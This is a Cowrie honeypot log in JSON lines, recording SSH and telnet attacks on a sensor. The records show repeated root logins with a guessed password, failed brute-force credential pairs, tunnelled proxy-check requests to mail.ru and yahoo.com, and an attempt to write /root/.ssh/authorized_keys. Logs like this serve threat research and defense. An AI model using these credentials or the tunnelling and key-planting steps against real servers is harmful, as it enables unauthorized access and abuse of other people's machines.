{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":18678,"dst_ip":"1.2.3.4","dst_port":22,"session":"b2984b62bcf1","protocol":"ssh","message":"New connection: 77.83.207.83:18678 (1.2.3.4:22) [session: b2984b62bcf1]","sensor":"my-vps","timestamp":"2025-08-31T03:50:47.308803Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:50:47.318610Z","src_ip":"77.83.207.83","session":"b2984b62bcf1"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:50:47.361430Z","src_ip":"77.83.207.83","session":"b2984b62bcf1"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-31T03:50:47.398361Z","src_ip":"212.227.235.229","session":"687623d528c5"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:50:47.399311Z","src_ip":"212.227.235.229","session":"687623d528c5"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:50:47.614433Z","src_ip":"77.83.207.83","session":"b2984b62bcf1"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"89.221.239.1","dst_port":80,"src_ip":"77.83.207.83","src_port":12248,"message":"direct-tcp connection request to 89.221.239.1:80 from 127.0.0.1:12248","sensor":"my-vps","timestamp":"2025-08-31T03:50:47.666192Z","session":"b2984b62bcf1"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"89.221.239.1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 89.221.239.1:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:50:47.717377Z","src_ip":"77.83.207.83","session":"b2984b62bcf1"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":50934,"dst_ip":"1.2.3.4","dst_port":22,"session":"3ae4283b8c70","protocol":"ssh","message":"New connection: 212.227.235.229:50934 (1.2.3.4:22) [session: 3ae4283b8c70]","sensor":"my-vps","timestamp":"2025-08-31T03:50:47.722918Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:50:47.723637Z","src_ip":"212.227.235.229","session":"3ae4283b8c70"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.231.21","dst_port":80,"src_ip":"77.83.207.83","src_port":12095,"message":"direct-tcp connection request to 74.6.231.21:80 from 127.0.0.1:12095","sensor":"my-vps","timestamp":"2025-08-31T03:50:47.865325Z","session":"b2984b62bcf1"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.231.21","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 74.6.231.21:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:50:47.916283Z","src_ip":"77.83.207.83","session":"b2984b62bcf1"}
{"eventid":"cowrie.session.closed","duration":12.767776727676392,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:50:47.932343Z","src_ip":"212.227.235.229","session":"54b6dfcda208"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T03:50:48.053527Z","src_ip":"212.227.235.229","session":"3ae4283b8c70"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:44:3507::8001","dst_port":80,"src_ip":"77.83.207.83","src_port":22919,"message":"direct-tcp connection request to 2001:4998:44:3507::8001:80 from 127.0.0.1:22919","sensor":"my-vps","timestamp":"2025-08-31T03:50:48.061138Z","session":"b2984b62bcf1"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:44:3507::8001","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:44:3507::8001:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:50:48.112059Z","src_ip":"77.83.207.83","session":"b2984b62bcf1"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":52681,"dst_ip":"1.2.3.4","dst_port":23,"session":"8fcc5578bae7","protocol":"telnet","message":"New connection: 212.227.235.229:52681 (1.2.3.4:23) [session: 8fcc5578bae7]","sensor":"my-vps","timestamp":"2025-08-31T03:50:48.141047Z"}
{"eventid":"cowrie.session.closed","duration":"0.9","message":"Connection lost after 0.9 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:50:48.163909Z","src_ip":"77.83.207.83","session":"b2984b62bcf1"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":18784,"dst_ip":"1.2.3.4","dst_port":22,"session":"d9bc8ec40953","protocol":"ssh","message":"New connection: 77.83.207.83:18784 (1.2.3.4:22) [session: d9bc8ec40953]","sensor":"my-vps","timestamp":"2025-08-31T03:50:48.213279Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:50:48.222183Z","src_ip":"77.83.207.83","session":"d9bc8ec40953"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:50:48.263735Z","src_ip":"77.83.207.83","session":"d9bc8ec40953"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:50:48.513892Z","src_ip":"77.83.207.83","session":"d9bc8ec40953"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"185.180.201.1","dst_port":80,"src_ip":"77.83.207.83","src_port":9084,"message":"direct-tcp connection request to 185.180.201.1:80 from 127.0.0.1:9084","sensor":"my-vps","timestamp":"2025-08-31T03:50:48.565443Z","session":"d9bc8ec40953"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"185.180.201.1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 185.180.201.1:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:50:48.615782Z","src_ip":"77.83.207.83","session":"d9bc8ec40953"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"98.137.11.163","dst_port":80,"src_ip":"77.83.207.83","src_port":6744,"message":"direct-tcp connection request to 98.137.11.163:80 from 127.0.0.1:6744","sensor":"my-vps","timestamp":"2025-08-31T03:50:48.760608Z","session":"d9bc8ec40953"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"98.137.11.163","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 98.137.11.163:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:50:48.810900Z","src_ip":"77.83.207.83","session":"d9bc8ec40953"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:44:3507::8001","dst_port":80,"src_ip":"77.83.207.83","src_port":22497,"message":"direct-tcp connection request to 2001:4998:44:3507::8001:80 from 127.0.0.1:22497","sensor":"my-vps","timestamp":"2025-08-31T03:50:48.952477Z","session":"d9bc8ec40953"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:44:3507::8001","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:44:3507::8001:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:50:49.002825Z","src_ip":"77.83.207.83","session":"d9bc8ec40953"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:50:49.054057Z","src_ip":"77.83.207.83","session":"d9bc8ec40953"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":18887,"dst_ip":"1.2.3.4","dst_port":22,"session":"2bdcc7da4796","protocol":"ssh","message":"New connection: 77.83.207.83:18887 (1.2.3.4:22) [session: 2bdcc7da4796]","sensor":"my-vps","timestamp":"2025-08-31T03:50:49.102233Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:50:49.103177Z","src_ip":"77.83.207.83","session":"2bdcc7da4796"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:50:49.152746Z","src_ip":"77.83.207.83","session":"2bdcc7da4796"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:50:49.400345Z","src_ip":"77.83.207.83","session":"2bdcc7da4796"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"185.180.201.1","dst_port":80,"src_ip":"77.83.207.83","src_port":7258,"message":"direct-tcp connection request to 185.180.201.1:80 from 127.0.0.1:7258","sensor":"my-vps","timestamp":"2025-08-31T03:50:49.450922Z","session":"2bdcc7da4796"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"185.180.201.1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 185.180.201.1:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:50:49.500659Z","src_ip":"77.83.207.83","session":"2bdcc7da4796"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-31T03:50:49.602105Z","src_ip":"212.227.235.229","session":"3ae4283b8c70"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.143.25","dst_port":80,"src_ip":"77.83.207.83","src_port":25884,"message":"direct-tcp connection request to 74.6.143.25:80 from 127.0.0.1:25884","sensor":"my-vps","timestamp":"2025-08-31T03:50:49.639918Z","session":"2bdcc7da4796"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.143.25","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 74.6.143.25:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:50:49.689528Z","src_ip":"77.83.207.83","session":"2bdcc7da4796"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:24:120d::1:0","dst_port":80,"src_ip":"77.83.207.83","src_port":19664,"message":"direct-tcp connection request to 2001:4998:24:120d::1:0:80 from 127.0.0.1:19664","sensor":"my-vps","timestamp":"2025-08-31T03:50:49.832105Z","session":"2bdcc7da4796"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:24:120d::1:0","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:24:120d::1:0:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:50:49.881977Z","src_ip":"77.83.207.83","session":"2bdcc7da4796"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:50:49.932930Z","src_ip":"77.83.207.83","session":"2bdcc7da4796"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":18984,"dst_ip":"1.2.3.4","dst_port":22,"session":"6bafc1d5209f","protocol":"ssh","message":"New connection: 77.83.207.83:18984 (1.2.3.4:22) [session: 6bafc1d5209f]","sensor":"my-vps","timestamp":"2025-08-31T03:50:49.982529Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:50:49.983232Z","src_ip":"77.83.207.83","session":"6bafc1d5209f"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:50:50.033639Z","src_ip":"77.83.207.83","session":"6bafc1d5209f"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:50:50.284979Z","src_ip":"77.83.207.83","session":"6bafc1d5209f"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"90.156.232.4","dst_port":80,"src_ip":"77.83.207.83","src_port":10912,"message":"direct-tcp connection request to 90.156.232.4:80 from 127.0.0.1:10912","sensor":"my-vps","timestamp":"2025-08-31T03:50:50.336334Z","session":"6bafc1d5209f"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"90.156.232.4","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 90.156.232.4:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:50:50.386750Z","src_ip":"77.83.207.83","session":"6bafc1d5209f"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.231.21","dst_port":80,"src_ip":"77.83.207.83","src_port":20449,"message":"direct-tcp connection request to 74.6.231.21:80 from 127.0.0.1:20449","sensor":"my-vps","timestamp":"2025-08-31T03:50:50.528894Z","session":"6bafc1d5209f"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.231.21","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 74.6.231.21:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:50:50.579470Z","src_ip":"77.83.207.83","session":"6bafc1d5209f"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"src_ip":"77.83.207.83","src_port":32761,"message":"direct-tcp connection request to 2001:4998:124:1507::f000:80 from 127.0.0.1:32761","sensor":"my-vps","timestamp":"2025-08-31T03:50:50.720855Z","session":"6bafc1d5209f"}
{"eventid":"cowrie.login.failed","username":"master","password":"12345678","message":"login attempt [master/12345678] failed","sensor":"my-vps","timestamp":"2025-08-31T03:50:50.771604Z","src_ip":"212.227.235.229","session":"e204ebe5e543"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:124:1507::f000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:50:50.772125Z","src_ip":"77.83.207.83","session":"6bafc1d5209f"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:50:50.823036Z","src_ip":"77.83.207.83","session":"6bafc1d5209f"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":19100,"dst_ip":"1.2.3.4","dst_port":22,"session":"a1b043fac203","protocol":"ssh","message":"New connection: 77.83.207.83:19100 (1.2.3.4:22) [session: a1b043fac203]","sensor":"my-vps","timestamp":"2025-08-31T03:50:50.872193Z"}
